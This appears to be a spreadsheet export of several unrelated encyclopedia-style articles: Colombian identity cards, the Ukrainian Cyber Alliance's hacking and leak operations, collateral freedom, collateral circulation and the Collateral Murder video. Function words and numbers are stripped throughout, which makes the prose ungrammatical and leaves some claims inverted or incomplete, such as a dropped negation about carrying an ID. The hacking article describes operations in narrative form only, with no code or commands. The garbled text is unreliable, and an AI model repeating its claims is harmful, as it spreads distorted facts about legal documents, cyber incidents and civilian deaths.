number. 2005, series bureaucratic technical problems, national registry civil status colombia, decree, determined january 2010, valid identity document issued year 2000, yellow holograms. this date later postponed july 2010. 2020, electronic identity document announced, began issued december year. document allows citizens identify carry procedures without need physical document. electronic document stored smartphone device national civil registry’s app, available android devices. obtaining citizen card colombian citizens obtain citizen card presenting colombian registry consular office previous form identification, birth certificate, letter naturalization, resolution registration colombian adoption, “tarjeta identidad,” form identification given minors. person obtaining citizenship card must least years old. other requirements include providing three color photographs individual white background, however registry offices within colombia require this, knowing blood type factor. individual bald light-colored hair, photos must taken blue background. service free charge individual getting citizen card first time. those request duplicates theft, incorrect information, loss damage must provide information also $55,750. this document mandatory colombian citizens years reside colombia seeking consular assistance abroad. after procedure, provisional document called “contraseña” (english: password) delivered citizen's photo, fingerprint, name nuip (unique personal identification number). delivery time document varies, ranging three months depending office procedure done. military police authorities require document. national police code defines article literal that: "the following behaviors affect relationship people authorities therefore carried out. performance give rise corrective measures: (...) prevent hinder, hinder resist identification individualization procedure, police authorities". general fine type imposed; participation community program educational activity coexistence. however, carrying document considered crime. international travel holders colombian identification document enter without passport member countries union south american nations exception suriname, guyana venezuela. this includes: andean community (can): peru bolivia ecuador mercosur (southern common market) member associated states: argentina brazil chile paraguay uruguay current identity card adults electronic identity document (2020-present) electronic identity card issued since december 2020, replacing previous iteration yellow holograms. expires every years. this form identification also stored smartphone runs android operating systems using registry’s app. validity physical counterpart. characteristics material: polycarbonate length: width: front header consists inscriptions "cédula ciudadanía" "república colombia,” small colombian flag, lower right corner butterfly changes color gold/green. background, mainly yellow blue, consists geometric patterns relief, curves, book thirteen butterflies. following information found. photo person nuip (número único identidad personal unique personal identification number) last name(s) first name(s) nationality height photo window date birth blood type place birth date place issue signature expiration date back header consists inscription ".co” domain name country. background, mostly yellow blue, consists geometric patterns, curves, iglesia pedro claver, cartagena. back following information. serial number photo window signature national registry biometric code three-line data machine-readable zone identification document number security measures unlike yellow holograms card, format include printing right index. however order issued colombian citizens, fingerprints biometric data taken stored. code uses abis (automated biometric identification system sistema automático identificación biometrías) technology allows government entities verify identity bearer document accessing citizen's biometric database. formats previous identity documents yellow holograms identity card (2000-2020) yellow holograms card issued 2000, replacing previous iterations document. despite longer issued 2020, still considered valid document. unlike electronic card, yellow holograms card expiration date. characteristics material: plastic length: width: front header consists inscriptions "república colombia,” "identificación personal" "cédula ciudadanía.” background, mostly yellow, gray pink, consists curved patterns country's coat arms inscribed circle; holograms show emblem registry phrase "república colombia.” front face find following information. photo person nuip (número único identidad personal unique personal identification number) last name(s) first name(s) electronic signature back header. background, mostly yellow pink, consists curved patterns, registrar's emblem inscribed white circle. back following information. fingerprint right index finger date birth place birth height blood type date place issue signature national registry matrix citizen information biometrics this format includes printing right index. however, order issued colombian citizens, fingerprints biometric data taken stored. matrix uses afis (automated fingerprint identification system) technology allows government entities verify identity bearer card comparing citizen's fingerprints. brown laminated identity card (1993-2000) brown laminated identity card, first issued since 1993, stopped produced 2000 yellow holograms card introduced. brown laminated card valid since august 2010. characteristics material: plastic length: width: front header consists inscriptions "república colombia,” "identificación personal" "cédula ciudadanía.” background white consists brown patterns coat arms country ornaments. obtains following information: black white photo person nuip (número único identidad personal unique personal identification number) last name(s) first name(s) signature cardholder back header. background white consists brown pattern, emblem registrar's office inscribed white circle. back following information. print right index finger date birth place birth height blood type date place expedition signature national registry barcode citizen information biometrics this format includes printing right index fingerprint ink. white laminated identity card (1952-1993) white laminated card used 1952 1993, brown laminated introduced. valid since august 2010. characteristics material: paper length: width: front header consists inscriptions "república colombia" "cedula ciudadanía.” background white country's coat arms printed green ink. front face find following information. black white photo person personal identification number place issue last name(s) first name(s) date place birth height skin color signals signature cardholder signature national registry print right index finger biometrics this format includes printing right index. electoral certificate "electoral certificate" issued people years february 1935. mandatory present document electoral purposes, according 1929, civil political acts personal identification necessary. identity card minors blue identity card (2014-present) this identity card issued minors (those 18), obtained valid identification purposes cannot used vote, unlike adult identity card. this current format. characteristics material: plastic length: width: front header consists inscriptions "república colombia,” "identificación personal" "tarjeta identidad.” background, blue orange, consists curved patterns; green/yellow color shift image. front face find following information. photo person nuip (número único identidad personal unique personal identification number) last name(s) first name(s) electronic signature back header. background, color front, consists curved patterns, emblem registry's office inscribed gray circle. back following information. digital printing right index finger date birth place birth blood type date place issue signature national registrar matrix citizen information biometrics this format includes digital printing right index. pink identity card (?-2014) this version identity card minors issued 2014. characteristics material: paper length: width: front header consists inscriptions "república colombia" "tarjeta identidad.” pink background, consists patterns curves. front face find following information. nuip (número único identidad personal unique personal identification number) last name(s) first name(s) date place birth blood type date place issue back heading consists inscription "registraduría nacional estado civil.” background white. back following information. signature municipal registrar color photograph person impression right index finger biometrics this format includes printing right index. identity card foreigners identity document (cédula ciudadanía) identity card exclusive colombian citizens. there identity document foreigners long-term visa, foreigner identity document (cédula extranjería) issued colombia migration identification document. this document allows exercise rights foreigner entitled colombian soil, colombian citizen, except vote elections, government positions, able exercise vote municipal, district council elections foreigner question hold resident visa. foreign identity document (documento identidad extranjería/cédula extranjería) foreign identity document issued colombia migration foreigners reside country days migrant resident visa. specific cases issues foreigners visitor’s visa. this document issued minors case, foreign identity document annotation “menores edad” cardholder’s photo. numbering document sometimes similar citizenship cards sometimes cases identification numbers, cause problems duplication information colombian databases. this document provide information regarding place birth place issue. unlike citizenship card, date issue changes every time foreign identity card renewed turning identification numbers foreign identity cards assigned based biographical archive foreign migration colombia assigned “historia extranjera” (foreign history) time issuing safe-conduct starting administrative process, time individual’s first visa registration foreign ministry. characteristics material: polycarbonate length: width: front header consists inscription "col" (colombia's acronym icao), "república colombia" "cédula extranjería.” purple background soft shades yellow white, consists circle patterns, right side shows facade casa nariño. round hologram middle document, coat arms colombia logo colombia migration. front face following information: photo person type visa (visitor, migrant resident) foreigner identity document number last name(s) first name(s) nationality icao acronym) date birth yyyy/mm/dd format) blood type issue date (changes update) expiration date cardholder minor, inscription says “menor edad” displayed photo electronic signature right index back matrix holder information structure identity document holograms, incompatible applications used) lateral barcode number internal legend spanish english duty holder notify colombian migration change status immigration information. signature director migration colombia [www.migracioncolombia.gov.co official website colombian migration] machine-readable zone also identity document colombian passport electronic identification german identity card documento nacional identidad (spain) electronic signature digital signature references external links official website chancellery colombia official website registraduría nacional estado civil</t>
  </si>
  <si>
    <t>Ukrainian Cyber Alliance</t>
  </si>
  <si>
    <t>ukrainian cyber alliance (uca, ukr. український кіберальянс, ука) community ukrainian cyber activists various cities ukraine around world. alliance emerged spring 2016 merger cyber activists, falconsflame trinity, later joined group ruh8 individual cyber activists cyberhunta group. hacktivists united counter russian aggression ukraine. participation russian-ukrainian cyber hacktivists began apply knowledge protect ukraine cyberspace spring 2014. over time, hacktivists began conduct joint operations. gradually, hacker groups united ukrainian cyber alliance (uca), accordance art. constitution ukraine defend independence country territorial integrity, duty every citizen. ukrainian cyber alliance exclusively transmits extracted data analysis, reconnaissance publication international intelligence community inform napalm, well enforcement agencies ukraine. notable operations operation #opdonbasleaks spring 2016, conducted hundred successful hacks websites mailboxes militants, propagandists, curators, terrorist organizations operating occupied territories. among targets mailbox russian organization named "union volunteers donbass". from obtained passport data photo documents citizens italy, spain, india finland, fighting prizrak brigade, russia grants, and, necessary, extends visas. found russians wounded fighting eastern ukraine treated military hospitals ministry defense. hacking anna news site april 2016, inform napalm website, call uca, reported hacking interface abkhazian network news agency (anna news) news agency. result hacking, site work days. hacktivists posted first video message site's pages, used lviv metro meme. message stated (translation): everyone. lviv metro station. video appeal ukrainian hackers enemies allies. watching video, cleared information space another russian terrorists site. turn enemies. today removed confidential information resource. your data administrators users transferred inform napalm volunteer intelligence, also sent ukrainian special services. backups site destroyed, remained give last chance start scratch longer information space lies terror. turn allies. friends! georgia, ukraine syria faced vile terrorist aggression russian federation. many lost homes, families loved ones. victory aggressor consolidation society. ordinary programmers, engineers volunteers. weapons reason, faith free will. each inflict losses enemy. russian goods, trust russian media. support ukrainian military patriots. help need help protection. support other. together force vile lying enemy. glory ukraine! operation #opmay9 2016, conducted operation #opmay9. nine sites donetsk people's republic (dnr) terrorists, propagandists, russian private military companies (rpmcs) hacked. broken sites left hashtags #opmay9 #oп9травня three short videos world ukrainian contributions victory nazism called "serum truth". hacktivists also posted video message terrorist sites. video stated: forbid. lviv metro again. after previous video april viewers decided joking. joking, speaking quite seriously. after last attack, popular site aggressive russian propaganda anna news unavailable days. information resource aimed spreading lies georgia, ukraine syria. first video call hung site hours, administrators took hours least partially restore resource. time, lost much data forever. small gift society great feast resurrection christ. shown light easily destroys darkness. enough strength successfully defeat aggressor, need believe work hard everyone together. victory. kievan rus, successor ukraine, cossacks zaporozhian sich kholodny yar, soldiers ukrainian insurgent army ukrainians ranks allied armies. these ancestors fought unbreakable strength shed blood land freedom. years ago, ukrainian people lost million sons daughters fight aggressor occupier. brown plague come borders, disguised colors striped ribbons russian tricolors. matter strong enemy seem, destiny defeated covered shame. ukrainian people, soldiers, patriots, volunteers already proved indomitable embedded genetic code. today, remembrance victory, giving gift ukrainian society. day, entire network information resources aggressor sites russian terrorists donbass paralyzed. this video message materials exposing occupiers' lies appear many enemy websites. then, now. glory ancestors, glory heroes past future. glory ukraine! operation #opmay18 2016, remembrance deportation crimean tatars 1944, conducted operation #opmay18. targeted website so-called chairman council ministers republic crimea, sergey aksyonov, putting voice fraudulent message: dear citizens crimea, today propose honor memory difficult days 1944 make every effort prevent tragic events again. currently, international situation 2017, russians deported crimea. conclusion, want glad crimean tatar singer jamala eurovision-2016 contest, look forward successful holding eurovision-2017 ukraine, namely crimea. channel hacking hacked website pervy kanal (channel russia), according hacktivists, part project force russia deoccupy donbass fulfill obligations minsk agreements. details pervy kanal propagandist serhiy zenin's cooperation russian state-owned propaganda network russia today also revealed, along documentation zenin's salary lavish lifestyle. zenin's cloud storage found videos members shooting settlement nikishine. operation #opday28 2016, constitution day, conducted operation #opday28. resources russian terrorists hacked, hacked sites played another lviv metro video purported leader dnr, zakharchenko:on june ukraine celebrates another anniversary adoption constitution. holiday overshadowed conflict donbass, inferior fools, resolved, caused numerous violations constitutional rights normal citizens. admit despite work done stupid press service loyal dogs dnr, whole world sees started playing sandbox, civilian population donbass suffers dies. truth rashka framed trying squeeze donbass crimea hands. personally apologize people ukraine idiocy hope anniversary constitution ukraine turning point relations donbass motherland ukraine! contrary racist propaganda, cured schizophrenia, ukrainian constitutional order prevail donbass! hacking russian ministry defense july 2016, hacked document management server department ministry defense russian federation, made public defense contracts executed 2015. success operation largely determined negligence russian rear admiral vernigora andrei petrovich. november 2016, broke ministry server second time obtained confidential data provision state defense order 2015–2016. according analysts inform napalm, documents show russia developing doctrine superiority event full-scale hostilities ukraine, citing amount allocated maintenance, modernization creation aircraft. operation #op256thday before programmer's day, conducted operation #op256thday, sites russian foreign aggression destroyed. many propaganda resources, hacktivists embedded inform napalm video demonstrating evidence russia's military aggression ukraine. operation #opkomendant activists gained access postal addresses regional branches "military commandant's office" operation #opkomendant. months, data boxes passed analysis inform napalm volunteers, employees peacemaker center, security service ukraine special operations forces ukraine. hacking aleksey mozgovoy october 2016, obtained pages e-mail correspondence leader prizrak brigade, aleksey mozgovoy. judging correspondence, mozghovyi completely control unknown agent codename "diva". hacking arsen pavlov obtained data gadgets arsen "motorola" pavlov, leader sparta battalion, wife olena pavlova (kolienkina). weeks leading death, pavlov alarmed conflict russian curators. surkovleaks operation october 2016, accessed mailboxes vladislav surkov, vladimir putin's political adviser relations ukraine. acquired emails published inform napalm late october early november (surkovleaks). emails revealed plans destabilize federalize ukraine, materials demonstrated high-level russian involvement start eastern ukraine. official told news emails corroborated information previously provided. authenticity emails confirmed atlantic council bellingcat, published numerous western news sources. aftermath leaks, surkov's chief staff resigned. additional emails belonging people surkov's environs published early november, detailing russia's financing "soft federalization" ukraine, recruiting odesa region, evidence funding election campaigns kharkiv region. emails stated yuriy rabotin, head odessa branch union journalists ukraine, received payment kremlin anti-ukrainian activities. april 2018, british newspaper times published article stating surkovleaks documents exposed russia's misinformation downing malaysia airlines flight order accuse ukraine. hacking ministry coal energy november 2016, obtained emails dnr's "ministry coal energy", including certificate prepared ministry energy russian federation january 2016, detail plans occupiers donbass coal industry. frolovleaks operation frolovleaks conducted december 2016, produced correspondence kyrylo frolov, deputy director institute (commonwealth independent states) press secretary union orthodox citizens, period 1997–2016. correspondence contains evidence russia's preparation aggression ukraine (long 2014). also revealed frolov's close ties sergey glazyev, russian president's adviser regional economic integration, moscow patriarch vladimir gundyaev, konstantin zatulin, member foreign defense policy council, illegitimate member russian state duma director institute. letters mention hundreds others connected subversive activities russia's fifth column organizations ukraine. hacking luhansk intelligence chief time, activists monitored computer chief intelligence (luhansk, ukraine) russian armed forces. this officer sent reports intelligence obtained help regular russian unmanned aerial vehicles (uavs) orlan, forpost takhion also used adjust fire artillery. documents also published proving existence russian ground reconnaissance station psnr-8 "credo-m1" (1l120) occupied territory. july 2017, basis obtained data, additional reconnaissance conducted social networks service russian takhion (servicemen 138th omsbr armed forces private laptev denis alexandrovich corporal angalev artem ivanovich). surveillance provided evidence troop movements ukraine border august 2014. list soldiers, personal numbers, ranks, exact titles, information awards military service peacetime published. operation also determined timeline invasion russian artillery unit 136th omsbr summer 2014, moment loading equipment fortifying occupied territory ukraine novosvitlivka, samsonivka, sorokine (formerly krasnodon). hacking oleksandr usovskyi february march 2017, exposed correspondence belarus citizen alexander usovsky, publicist whose articles often published website ukrainian choice, anti-ukrainian backed oligarch viktor medvedchuk. inform napalm analysts conducted study emails published articles kremlin financed anti-ukrainian actions poland eastern european countries. published materials caused outrage poland, czech republic ukraine. interview fronda.pl, polish general roman polko, founder polish special operations forces, stated conviction anti-ukrainian actions poland desecration polish monuments ukraine inspired kremlin. polko said information posed threat whole europe, polish radicals useful idiots manipulated russia. hacking institute analysis hacked emails institute (commonwealth independent states) revealed financed russian state company gazprom. gazprom allocated million annually finance anti-ukrainian activities institute. head institute, state duma deputy konstantin zatulin, helped terrorists former berkut members fled russia obtain russian passports. hacking russian foundation public diplomacy access mail gorchakovan, employee russian foundation public diplomacy, provided insight forms russia's foreign policy strategy. war, funding six-month propaganda plan ukraine reached quarter million dollars. under guise humanitarian projects, subversive activities carried ukraine, serbia, bosnia herzegovina, bulgaria, moldova, baltic states. hacking oleksandr aksinenko activists gained access mailbox telephone miner oleksandr aksineko, citizen russia israel. correspondence indicates aksinenko's terrorist activities supported russian federal security service (fsb), advised "work spirit". aksinenko also sent anonymous letters security service ukraine (sbu) structures ukraine. #fuckresponsibledisclosure flashmob 2017, specialists held two-month action assess level protection ukrainian public resources, check whether officials responsible information security. many vulnerabilities uncovered information systems government agencies. activists identified reported vulnerabilities openly could influence situation. activists noted effectiveness publicly shaming government agencies. example, found computer main directorate national police kyiv region could accessed without password found network drive information, including passwords, plans, protocols, personal data police officers. also found bila tserkva police website hacked long time, volunteers noticed situation improve. scfm updated servers years. activists also found website judiciary ukraine kept reports courts public domain. kherson regional council opened access joint disk. cert-ua website (ukraine's computer emergency response team) posted password email accounts. capital's taxi services found keep open information clients, including dates, phone numbers, departure destination addresses. vulnerabilities also revealed kropyvnytskyi's vodokanal, energoatom, kyivenerhoremont, napc, kropyvnytskyi employment center, nikopol pension fund, ministry internal affairs (declarations employees, including special units, made public).the police opened criminal case "dmitry orlov", pseudonym activist publicized vulnerabilities flash mob. they also allegedly tried hack orlov website, leaving message threatened physical violence continued activities. activist deleted website fulfilled function. list-1097 activists obtained records orders provide food servicemen separate motorized rifle brigades russian armed forces, sent combat missions russian occupation crimea. inform napalm volunteers searched open sources information social network profiles servicemen named orders, discovered photo evidence participation occupation crimea. records also revealed troops transferred crimea, voinka.on january 2017, central german state channel aired story cyber ukraine russia. story documented repeated cyber attacks russian hackers civilian infrastructure ukraine efforts counter russian aggression cyberspace, particular surkov leaks. representatives portrayed heroes story. former state duma deputy denis voronenkov (who received ukrainian citizenship) made statements surkov categorically annexation crimea. response, released photos audio recordings congress union donbas volunteers, 2016 annexed crimea november 2016 moscow, surkov guest honor.volunteers inform napalm community created film uca's activities called cyberwar: review successful operations ukrainian cyber alliance 2016. references</t>
  </si>
  <si>
    <t>Collateral freedom</t>
  </si>
  <si>
    <t>collateral freedom anti-censorship strategy attempts make economically prohibitive censors block content internet. this achieved hosting content cloud services considered censors "too important block," using encryption prevent censors identifying requests censored information hosted among content, forcing censors either allow access censored information take entire services. also domain fronting lantern (software) telex (anti-censorship system) refraction networking references</t>
  </si>
  <si>
    <t>Collateral circulation</t>
  </si>
  <si>
    <t>collateral circulation alternate circulation around blocked artery vein another path, nearby minor vessels. occur preexisting vascular redundancy (analogous engineered redundancy), circle willis brain, occur branches formed adjacent blood vessels (neovascularization), retinal embolism brain moyamoya occurs. formation provoked pathological conditions high vascular resistance ischaemia. example usefulness collateral circulation systemic thromboembolism cats. this thrombotic embolus lodges external iliac artery (common iliac artery), blocking external internal iliac arteries effectively shutting blood supply hind leg. even though main vessels blocked, enough blood tissues collateral circulation keep alive. brain blood flow brain humans animals maintained network collateral arteries anastomose (join) circle willis, lies base brain. circle willis so-called communicating arteries exist front (anterior) back (posterior) parts circle willis, well left right side circle willis. heart another example humans animals acute myocardial infarction (heart attack). collateral circulation heart tissue sometimes bypass blockage main artery supply enough oxygenated blood enable cardiac tissue survive recover. after central retinal vein occlusion, neovascularization restore blood flow retina, vessels' bulk also presents risk causing acute glaucoma blocking drainage aqueous humour. collateral circulation created (within months) around blocked central vein generally winding path, usually branch vein choroid. truncal venous system hepatic cirrhosis arising congestion hepatic portal vein give rise collateral circulation branches portal caval veins liver, caval veins. consequences newly established venous collaterals arising portal hypertension include esophageal varices hemorrhoids (portocaval collateral circulation). references</t>
  </si>
  <si>
    <t>Collateral Murder video</t>
  </si>
  <si>
    <t>july 2007, series air-to-ground attacks conducted team u.s. ah-64 apache helicopters al-amin al-thaniyah, baghdad, iraqi insurgency followed invasion iraq. april 2010, attacks received worldwide coverage controversy following release minutes gunsight footage internet whistleblower website wikileaks. footage portrayed classified, individual leaked u.s. army soldier chelsea manning, testified 2013 video classified. video, wikileaks titled collateral murder, showed crew firing group killing several them, laughing casualties, civilians, including reuters journalists. anonymous u.s. military official confirmed authenticity footage, provoked global discussion legality morality attacks. first strike, crews apaches directed cannon fire group iraqi men, including armed, standing less meters away u.s. ground troops location insurgents earlier attacked american humvee small arms fire. among group iraqi correspondents working reuters, saeed chmagh namir noor-eldeen. seven (including noor-eldeen) killed first strike; saeed chmagh, injured, later died hospital. second strike, also using rounds, directed whose driver, saleh matasher tomal, appeared happen drive proceeded help wounded chmagh. however, long version video shows already targeted apache (crazyhorse 1/8), prior second strike, traveled south toward reuters employees simultaneously targeted apache (crazyhorse 1/9) walked group north road toward van. minutes first engagement ended, returned traveling opposite direction (north) road. assisting rescue effort group five standing intersection seen upper right corner video reuters employees arrive courtyard reported apaches second position combatants using attack humvee. both men, chmagh tomal, killed second strike, tomal's children badly wounded. third strike, apache pilots watched people, including armed men, building engaged building several agm-114 hellfire missiles. context according raju, reporter cnn, "the soldiers bravo company, 2–16 infantry fire morning rocket-propelled grenades small arms first operation ilaaj baghdad". jazeera stated army received "reports small arms fire", unable positively identify gunmen. apache helicopters called soldier humvee (hotel 2–6) attack position used namir noor-eldeen photograph vehicle. according military review, soldiers company "had sporadic small arms rocket propelled grenade fire since" operation—described "clearing sector looking weapons caches"—began.the weapons team (awt) apache ah-64s cavalry division requested battalion, 16th infantry regiment (2–16), brigade combat team, infantry division command lieutenant colonel ralph kauzlarich, july support operation ilaaj. tasked conduct escort, armed reconnaissance patrols, counter-ied counter-mortar operations, helicopters left camp taji 9:24 a.m. they arrived station baghdad 9:53 a.m., sporadic attacks coalition forces continued. incidents attack personnel video morning july 2007, crews united states army ah-64 apache helicopters observe gathering near section baghdad path advancing u.s. ground troops, armed akms rpgs. crew estimates group twenty men. among group journalists working reuters, namir noor-eldeen saeed chmagh. while carrying media cards, military officer claimed wearing distinctive clothing identifying such. noor-eldeen camera chmagh talking mobile phone.a crew member requests authorization engage seeing five moving direction u.s. soldiers. long shadow cast ground telephoto lens noor-eldeen's camera misidentified pilot additional aimed u.s. army humvee directly aircraft. second later screams, "he's rpg!" noor-eldeen fails photograph apache three pictures u.s. humvee appear camera's memory card recovered u.s. soldiers. become obscured behind building apache moves around group. both helicopters strafe group rounds became visible again. after lead helicopter fires, crew shouts "hahaha. 'em" another member crew responds yeah, look dead bastards".seven killed, including noor-eldeen chmagh, three others wounded. once group eliminated, apache pilots direct ground troops move position attack clear area. attack ground troops advanced, wounded chmagh seen crawling attempting stand. u.s. soldiers moved towards site attack, stopped near chmagh. military said "fair game army rules" visible markings suggest ambulance protected vehicle. apache crew alerted ground troops requested permission engage vehicle ground troops arrived. apache crew unarmed exit vehicle move chmagh. apache crew requested permission engage, stating "looks like [the men] possibly, picking bodies weapons" scene, repeated request shoot, received permission begin firing occupants. chmagh killed along three men, children, known u.s. forces, injured. children, girl boy, suffered injuries. girl suffered stomach wound glass eyes, head injury. just destroyed, u.s. ground troops made final turn arrived road van. apache crew alerted ground troops believed could injured child moving around inside destroyed van. video, seen army soldiers establish perimeter around site extract children burning van. when helicopter pilots discover killed number iraqi civilians wounded children, heard say: "well, it’s fault bringing kids battle". attack building ground troops secured site first strikes receive small arms fire nearby buildings. there period minutes included leaked tape. according internal legal review, helicopters engaged group armed insurgents, seen entering nearby building.as tape resumes, men, holding ak-47, seen walking. they split footage follows appears armed. walks building identified source fire u.s. ground troops. they request permission fire missile building, describing "abandoned" "under construction". ground controller responds, [positively identified] individuals building weapons, ahead engage building". pilot positions helicopter attack building, unarmed walk towards, perhaps into, building. gunner fires first missile, another seen walking along street front building. missile hits building, caught explosion. crew reposition helicopter fire missiles upper floors building commentary wikileaks said preface videos incident "some appear armed [although] behavior nearly everyone relaxed" introductory text shorter video. julian assange said "permission engage given word 'rpg' ever used". politifact stated: "when assange points context justifying title 'collateral murder' word 'rpg' used permission engage given, leaves impression soldiers given okay open fire group unarmed men, believed unarmed. video accompanying audio make clear soldiers helicopter said spotted 'weapons' among group—later identified internal army investigator ak-47 rpg." assange later said "based upon visual evidence, suspect probably rpg, sure means anything". legal review carried u.s. army stated children evacuated 28th combat support hospital forward operating base loyalty, transferred iraqi medical facility next day.fox news said attack "wikileaks appears done selective editing tells half story. instance, site takes special care slow video identify photographers cameras carrying. …the site slow video show least group carrying rocket-propelled grenade launcher, clearly visible weapon runs nearly two-thirds length body. wikileaks also point least carrying ak-47 assault rifle. seen swinging weapon waist standing next holding rpg."the guardian stated unclear armed noor-eldeen seen camera". glenn greenwald salon.com said "the vast majority clearly unarmed". greenwald called second airstrike "plainly unjustified killing group unarmed carrying away unarmed, seriously wounded safety". australian newspaper said group displaying obvious hostile action".in independent april 2010, human rights activist joan smith wrote engagements like game helicopter crew. wrote co-pilot urged dying, unarmed journalist pick weapon tried crawl safety "the apache crew open[ed] fire civilians". when crew informed child injured attack, initially responded, damn. well", minute later continued, "well, fault bringing kids battle". smith describes reaction inhuman. draws parallels soldiers suffered post-traumatic stress disorder earlier wars. continued, "the wars iraq afghanistan inflicting huge psychological damage combatants". refusing recognize this, military fails soldiers victims. concluded command structures need place identify "combatants serious psychological problems".on democracy now!, josh stieber, time assigned bravo company 2–16, said although natural "judge criticize soldiers", fact "this [they] trained act". said debate re-framed, appropriate "questions larger system" teaches "doing things best interests country". 2009, stieber left military conscientious objector became member iraq veterans against war. later interview world socialist site, stieber said attack "exposes clearly fallacy using tool foreign policy supposedly spread 'freedom democracy' around world".ethan mccord, soldier arrived scene attack, stated interview australian broadcasting corporation: from perspective apache helicopter crew, group gathering, there's firefight blocks away, involved they’re carrying weapons, rpg. …their overall mission protect provide support initial attack group warranted. however, personally feel attack warranted. think people could deterred simply firing warning shots versus completely obliterating occupants. june 2010, yorker reported kristinn hrafnsson, investigative reporter worked collateral murder video later became spokesman wikileaks, said found owner building involved incident. owner told three families living building seven residents died, including wife daughter. report stated helicopter crew know many people building destroyed missiles, "there evidence unarmed people entered nearby". concluded investigating officer would want know armed identified combatants earlier engagement; would question nature collateral-damage estimate carried crew missiles launched; would wish determine whether missile attack proportionate response threat. pentagon spokesman said video contradict official finding helicopters' crew acted within rules engagement said inquiry backed assessment group carrying rocket-propelled grenade (rpg).assange stated attack damning part video: "i'm sceptical done rules engagement; and, legal, rules engagement must changed". news reported 2010 rules engagement iraq changed since incident occurred. 2007–2009 coverage attack u.s. military reported journalists killed along nine insurgents, helicopter engagement related u.s. troop raid force attacked small-arms fire rpgs. u.s. forces spokesman lieutenant colonel scott bleichwehl later stated: "there question coalition forces clearly engaged combat operations hostile force".the washington post reported unclear whether journalists killed u.s. fire shooting targeted iraqis. captain james hall stated drive bradleys fear running bodies. major brent cummings claimed took great pains prevent loss innocent civilian lives.reuters reported could locate witnesses seen gunmen immediate area. reuters also stated local police described attack "random american bombardment". reuters subsequently asked u.s. military probe deaths. they asked explanation confiscation journalists' cameras, access on-board footage voice communications helicopters involved, access reports units involved incident, particularly logs weapons taken scene.on july 2007, off-the-record briefing baghdad u.s. military, reuters editors shown "less three minutes video apache’s camera, exact moment opened fire first time." editors asked remaining footage reuters could check whether edited manipulated. their request denied briefing told seek access u.s. freedom information act. reuters requested copy full video freedom information (foia) day. personal statement court-martial, chelsea manning stated military access video, actively examining told reuters response foia request information might longer exist. pentagon eventually blocked foia request despite several follow-up requests reuters.an internal legal review staff forward operating base loyalty iraq july 2007 stated helicopters attacked number armed insurgents within rules engagement, apparent case civilian casualties reporters working reuters also killed. review released full 2010, video incident released wikileaks.after u.s. military concluded actions soldiers accordance armed conflict "rules engagement", wikileaks released classified rules engagement 2006, 2007 2008, revealing rules before, during, attacks.washington post reporter david finkel, time embedded bravo company 2–16 infantry, later covered incidents book, good soldiers. february 2013 pretrial hearing, manning stated finkel "was quoting, feel verbatim, audio communications aerial weapons team crew". said "aghast" finkel's portrayal incident. "reading account," explained, "one would believe engagement somehow justified 'payback' earlier attack death soldier." coverage 2010 leaked video footage early 2010, internet whistleblower site wikileaks made public request assistance decrypting video described bomb strikes civilians", specifically requesting access supercomputer time. site stated twitter account january 2010, copy gunsight footage incidents. footage released april press conference national press club, subsequently designated website titled collateral murder. wikileaks stated footage shows "murder iraqi civilians reuters journalists". wikileaks identified leak's source number military whistleblowers". speaking reuters condition anonymity, u.s. defense official confirmed authenticity leaked audio video. military reported could find copy video.wikileaks released 39-minute version, shows three incidents, 17-minute version, shows first incidents. highlighted 17-minute version video noor-eldeen camera chmagh talking mobile phone. both videos depict attack van, driver, men, aftermath seriously injured children evacuated u.s. ground forces arrived scene. longer video shows third attack, hellfire missiles fired building. choice title video jazeera english interview april 2010, wikileaks' julian assange explained wikileaks titled video collateral murder: also deliberately target saaed, wounded ground, despite earlier belief rules engagement—that rules engagement permit kill saeed wounded. when rescued, suddenly belief changed. particular image lying ground people separated, still deliberately target him. this called collateral murder. first example maybe collateral exaggeration incompetence strafe initial gathering, recklessness bordering murder, sure murder. particular event—this clearly murder. stephen colbert, interview assange april 2010, asked title: "you edited tape, given title called 'collateral murder'. that's leaking, that's pure editorial." assange responded: promise make sources defend every means available technologically, legally politically maximum possible political impact material give colbert asked 'collateral murder' political impact?" assange responded: yes, absolutely… promise public release full source material. people different opinion, full material analyse assess. reactions video footage april 2010, ethan mccord, appears ground video, josh steiber, member company present day, wrote open letter reconciliation responsibility iraqi people apologising events video. they wrote that: what shown wikileaks video begins depict suffering created. from experiences, experiences veterans talked know acts depicted video everyday occurrences war: nature u.s.-led wars carried region. ahlam abdelhussein tuman, widow driving van, mother children mccord carried out, responded open letter 2010: accept apology, saved children, them, maybe little children would dead. would like american people whole world understand happened iraq. lost country lives destroyed. bill keller york times wrote, "but zeal make video work antiwar propaganda, wikileaks also released version call attention iraqi toting rocket-propelled grenade packaged manipulated version tendentious rubric collateral murder." york times wrote "critics contend shorter video misleading make clear attacks took place amid clashes neighborhood carrying rocket-propelled grenade."captain jack hanzlik, spokesman u.s. central command stated airstrike video "gives limited perspective, [it] tells portion activity happening day. just watching video, people cannot understand complex battles occurred. seeing narrow picture events". hanzlik said images gathered military investigation incident show multiple weapons around dead bodies courtyard, including least three rpgs. "our forces engaged combat individuals description video. their age, weapons, fact within distance forces engaged made apparent guys potentially threat." said wikileaks "does point least carrying ak-47 assault rifle. seen swinging weapon waist standing next holding rpg". wikileaks edited video arrows pointing men, label them, carrying cameras. wikileaks stated "some appear armed [although] behavior nearly everyone relaxed" introductory text shorter video.in interview news assange said "it's likely individuals seen video carrying weapons" "based upon visual evidence suspect probably rpg, sure means anything. nearly every iraqi household rifle those guys could protecting area". news later stated "although could argued ak-47 rifles common household items, rpgs not". draft version video wikileaks produced made reference ak-47s rpgs, wikileaks said ultimately became unsure rpg, believing long object could camera tripod, decided point released version. assange also said "it's ludicrous allege taken anything context video".u.s. defense secretary robert gates criticized wikileaks releasing video without providing context. "these people anything want, they're never held accountable there's there's after". gates said video provides public view warfare seen soda straw". gates stated: "they're combat situation. video show broader picture firing going american troops. it's obviously hard thing see. it's painful see, especially learn fact going you—you talked war. these people operating split second situations.".the yorker praised release, calling striking artifact—an unmediated representation ambiguities cruelties modern warfare".gabriel schoenfeld, senior fellow hudson institute, said airstrike: precisely presence weapons, including rpgs, goes long distance toward explaining cameramen reuters—pointing television cameras around corners battle zone—were readily mistaken gunships insurgents. video makes plain incident, almost military encounters iraq afghanistan, soldiers forces wear uniforms—a violation international precisely places innocent civilians jeopardy. responsibility civilian deaths encounters rests violate rules war. wikileaks videos also reveal hundreds upon hundreds cases american forces refrain attacking targets precisely civilians harm's way. daniel ellsberg, former united states military analyst known leaked pentagon papers media, said airstrike: would interesting someone speculate tell exactly context would lead justifying killing screen. killing goes obviously would killing lying ground operation 